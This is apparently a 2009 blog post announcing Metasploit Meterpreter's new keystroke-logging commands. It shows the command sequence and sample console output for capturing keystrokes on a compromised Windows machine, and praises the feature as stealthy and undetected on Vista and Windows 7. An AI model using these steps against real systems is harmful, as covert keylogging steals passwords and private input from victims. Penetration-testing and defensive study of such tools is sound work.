Today HD committed to the development tree of SVN bug fixes and updates to Meterpreter, among them the coolest of them all has to be the availability of keystroke logging. Now when you use Meterpreter as a payload you will get in the stdapi the ability to start Keystroke Login by running a simple set of commands. The new commands appear as follows:

Stdapi: User interface Commands
===============================
    Command        Description
    -------        -----------
    grabdesktop    Take over the active input desktop (needed for keyboard sniffing)
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump they keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    uictl          Control some of the user interface components

The new commands are grabdesktop, keyscan_dump, keyscan_start and keyscan_stop. To start the capture of keystrokes we must firs run grabdesktop and then keyscan_start, this will start the capture of all keyboard input into memory.

meterpreter > grabdesktop
Trying to hijack the input desktop...
meterpreter > keyscan_start
Starting the keystroke sniffer...

To dump the content of the buffer we run keyscan_dump, for this example I capture some text I typed into notepad:

meterpreter > keyscan_dump
Dumping captured keystrokes...
 <Back> epnow this a <Back> s a killer feature!!!!!!!! <Return>
meterpreter > keyscan_dump
Dumping captured keystrokes...
meterpreter >

Once the keystrokes are dumped they are cleared from the buffer, so save the output every time you do a dump since it will be lost. This new feature will only capture keyboard input, it will not capture clipboard content or any copy/paste activity, but it is extremely stealthy since it will only reside in memory and in my test machines with Vista with UAC enabled and on Windows 7 it did not trigger any alert. I’m anxiously looking forward on what will come next from the Metasploit team.

UPDATE 3/26/09

HD is making some changes in the code and on the names in the menu, as soon as I have a change to test and run in lab I will post an update to the post.